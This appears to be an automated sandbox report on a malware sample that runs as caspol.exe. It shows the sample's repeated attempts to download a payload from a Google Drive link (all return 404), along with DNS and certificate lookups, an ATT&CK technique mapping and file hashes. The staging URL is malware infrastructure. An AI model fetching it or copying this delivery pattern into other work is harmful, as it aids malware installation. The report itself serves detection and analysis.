Content-Security-Policy: script-src 'nonce-262g3IP7xRbzTxAIvAXV1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
GET

https://drive.google.com/uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7

caspol.exe

Remote address:

142.250.75.238:443

Request

GET /uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: drive.google.com
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sun, 29 Dec 2024 12:02:01 GMT
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'nonce-9qj2BQjwDobhpXiuZytGZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
GET

https://drive.google.com/uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7

caspol.exe

Remote address:

142.250.75.238:443

Request

GET /uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: drive.google.com
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sun, 29 Dec 2024 12:02:11 GMT
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'nonce-CXSUKlWi_62_AWLKG2KhEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
GET

https://drive.google.com/uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7

caspol.exe

Remote address:

142.250.75.238:443

Request

GET /uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: drive.google.com
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sun, 29 Dec 2024 12:02:21 GMT
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'nonce-HOYST7Knp8fJRlqaSxlUkg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
GET

https://drive.google.com/uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7

caspol.exe

Remote address:

142.250.75.238:443

Request

GET /uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: drive.google.com
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sun, 29 Dec 2024 12:02:31 GMT
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: script-src 'nonce-LJQV4wNhe7ig53QGCbkdjg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
GET

https://drive.google.com/uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7

caspol.exe

Remote address:

142.250.75.238:443

Request

GET /uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: drive.google.com
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sun, 29 Dec 2024 12:02:42 GMT
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'nonce-NFT5JpYl7ffdBwt6zrRKbQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
DNS

c.pki.goog

caspol.exe

Remote address:

8.8.8.8:53

Request

c.pki.goog

IN A

Response

c.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

142.250.179.67
GET

http://c.pki.goog/r/r1.crl

caspol.exe

Remote address:

142.250.179.67:80

Request

GET /r/r1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 854
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Sun, 29 Dec 2024 11:59:34 GMT
Expires: Sun, 29 Dec 2024 12:49:34 GMT
Cache-Control: public, max-age=3000
Age: 74
Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
DNS

o.pki.goog

caspol.exe

Remote address:

8.8.8.8:53

Request

o.pki.goog

IN A

Response

o.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

142.250.179.67
GET

http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD8Elu9WzbqaxI7ClVJiEyf

caspol.exe

Remote address:

142.250.179.67:80

Request

GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD8Elu9WzbqaxI7ClVJiEyf HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: o.pki.goog

Response

HTTP/1.1 200 OK

Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Date: Sun, 29 Dec 2024 11:28:28 GMT
Cache-Control: public, max-age=14400
Content-Type: application/ocsp-response
Age: 1941
DNS

238.75.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

238.75.250.142.in-addr.arpa

IN PTR

Response

238.75.250.142.in-addr.arpa

IN PTR

par10s41-in-f141e100net
DNS

67.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

67.179.250.142.in-addr.arpa

IN PTR

Response

67.179.250.142.in-addr.arpa

IN PTR

par21s19-in-f31e100net
DNS

212.20.149.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

212.20.149.52.in-addr.arpa

IN PTR

Response
DNS

15.164.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.164.165.52.in-addr.arpa

IN PTR

Response
DNS

92.12.20.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

92.12.20.2.in-addr.arpa

IN PTR

Response

92.12.20.2.in-addr.arpa

IN PTR

a2-20-12-92deploystaticakamaitechnologiescom
DNS

43.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.229.111.52.in-addr.arpa

IN PTR

Response

142.250.75.238:443

https://drive.google.com/uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7

tls, http

caspol.exe

6.2kB
45.3kB
70
68

HTTP Request

GET https://drive.google.com/uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7

HTTP Response

404

HTTP Request

GET https://drive.google.com/uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7

HTTP Response

404

HTTP Request

GET https://drive.google.com/uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7

HTTP Response

404

HTTP Request

GET https://drive.google.com/uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7

HTTP Response

404

HTTP Request

GET https://drive.google.com/uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7

HTTP Response

404

HTTP Request

GET https://drive.google.com/uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7

HTTP Response

404

HTTP Request

GET https://drive.google.com/uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7

HTTP Response

404

HTTP Request

GET https://drive.google.com/uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7

HTTP Response

404

HTTP Request

GET https://drive.google.com/uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7

HTTP Response

404

HTTP Request

GET https://drive.google.com/uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7

HTTP Response

404

HTTP Request

GET https://drive.google.com/uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7

HTTP Response

404

HTTP Request

GET https://drive.google.com/uc?export=download&id=1c7RwsKxpvwwW-HfBZATg1dCbWn9QC8m7

HTTP Response

404
142.250.179.67:80

http://c.pki.goog/r/r1.crl

http

caspol.exe

395 B
1.8kB
6
5

HTTP Request

GET http://c.pki.goog/r/r1.crl

HTTP Response

200
142.250.179.67:80

http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD8Elu9WzbqaxI7ClVJiEyf

http

caspol.exe

509 B
885 B
6
4

HTTP Request

GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD8Elu9WzbqaxI7ClVJiEyf

HTTP Response

200

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

172.214.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.214.232.199.in-addr.arpa
8.8.8.8:53

241.150.49.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

241.150.49.20.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

23.159.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

23.159.190.20.in-addr.arpa
8.8.8.8:53

drive.google.com

dns

caspol.exe

62 B
78 B
1
1

DNS Request

drive.google.com

DNS Response

142.250.75.238
8.8.8.8:53

c.pki.goog

dns

caspol.exe

56 B
107 B
1
1

DNS Request

c.pki.goog

DNS Response

142.250.179.67
8.8.8.8:53

o.pki.goog

dns

caspol.exe

56 B
107 B
1
1

DNS Request

o.pki.goog

DNS Response

142.250.179.67
8.8.8.8:53

238.75.250.142.in-addr.arpa

dns

73 B
112 B
1
1

DNS Request

238.75.250.142.in-addr.arpa
8.8.8.8:53

67.179.250.142.in-addr.arpa

dns

73 B
111 B
1
1

DNS Request

67.179.250.142.in-addr.arpa
8.8.8.8:53

212.20.149.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

212.20.149.52.in-addr.arpa
8.8.8.8:53

15.164.165.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

15.164.165.52.in-addr.arpa
8.8.8.8:53

92.12.20.2.in-addr.arpa

dns

69 B
131 B
1
1

DNS Request

92.12.20.2.in-addr.arpa
8.8.8.8:53

43.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

43.229.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Network Service Discovery

T1046

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_te0fnmis.tju.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/748-26-0x00000000076C0000-0x0000000007756000-memory.dmp

Filesize
600KB

Download
memory/748-31-0x000000007494E000-0x000000007494F000-memory.dmp

Filesize
4KB

Download
memory/748-6-0x0000000074940000-0x00000000750F0000-memory.dmp

Filesize
7.7MB

Download
memory/748-8-0x0000000074940000-0x00000000750F0000-memory.dmp

Filesize
7.7MB

Download
memory/748-9-0x0000000005550000-0x0000000005572000-memory.dmp

Filesize
136KB

Download
memory/748-10-0x00000000055F0000-0x0000000005656000-memory.dmp

Filesize
408KB

Download
memory/748-11-0x00000000056D0000-0x0000000005736000-memory.dmp

Filesize
408KB

Download
memory/748-5-0x0000000002C30000-0x0000000002C66000-memory.dmp

Filesize
216KB

Download
memory/748-21-0x0000000005E30000-0x0000000006184000-memory.dmp

Filesize
3.3MB

Download
memory/748-22-0x0000000006330000-0x000000000634E000-memory.dmp

Filesize
120KB

Download
memory/748-23-0x0000000006360000-0x00000000063AC000-memory.dmp

Filesize
304KB

Download
memory/748-24-0x0000000007B60000-0x00000000081DA000-memory.dmp

Filesize
6.5MB

Download
memory/748-25-0x00000000068A0000-0x00000000068BA000-memory.dmp

Filesize
104KB

Download
memory/748-4-0x000000007494E000-0x000000007494F000-memory.dmp

Filesize
4KB

Download
memory/748-7-0x0000000005800000-0x0000000005E28000-memory.dmp

Filesize
6.2MB

Download
memory/748-29-0x0000000007520000-0x0000000007620000-memory.dmp

Filesize
1024KB

Download
memory/748-27-0x0000000007650000-0x0000000007672000-memory.dmp

Filesize
136KB

Download
memory/748-30-0x0000000074940000-0x00000000750F0000-memory.dmp

Filesize
7.7MB

Download
memory/748-32-0x0000000074940000-0x00000000750F0000-memory.dmp

Filesize
7.7MB

Download
memory/748-28-0x0000000008790000-0x0000000008D34000-memory.dmp

Filesize
5.6MB

Download
memory/748-33-0x0000000074940000-0x00000000750F0000-memory.dmp

Filesize
7.7MB

Download
memory/748-34-0x0000000074940000-0x00000000750F0000-memory.dmp

Filesize
7.7MB

Download
memory/748-56-0x0000000074940000-0x00000000750F0000-memory.dmp

Filesize
7.7MB

Download
memory/748-44-0x0000000074940000-0x00000000750F0000-memory.dmp

Filesize
7.7MB

Download
memory/2644-37-0x0000000077361000-0x0000000077481000-memory.dmp

Filesize
1.1MB

Download
memory/2644-48-0x0000000001300000-0x0000000001400000-memory.dmp

Filesize
1024KB

Download
memory/2644-49-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/2644-50-0x0000000077361000-0x0000000077481000-memory.dmp

Filesize
1.1MB

Download
memory/2644-35-0x0000000001300000-0x0000000001400000-memory.dmp

Filesize
1024KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.